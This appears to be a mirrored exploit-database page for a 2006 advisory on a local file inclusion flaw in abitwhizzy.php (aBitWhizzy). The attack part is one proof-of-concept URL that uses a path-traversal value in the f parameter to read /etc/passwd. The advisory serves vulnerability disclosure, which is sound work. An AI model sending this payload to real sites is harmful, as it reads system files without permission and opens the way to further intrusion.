[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : aBitWhizzy (abitwhizzy.php) Information Disclosure Vulnerability
# Published : 2006-11-21
# Author : Security Access Point
# Previous Title : Seditio <= 1.10 (avatarselect id) Remote SQL Injection Vulnerability
# Next Title : Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities
aBitWhizzy [local file include]
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy
bug:local file include
global risk : high
http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd
laurent gaffi¨¦ & benjamin moss¨¦
http://s-a-p.ca/
contact: saps.audit@gmail.com
# www.Syue.com [2006-11-21]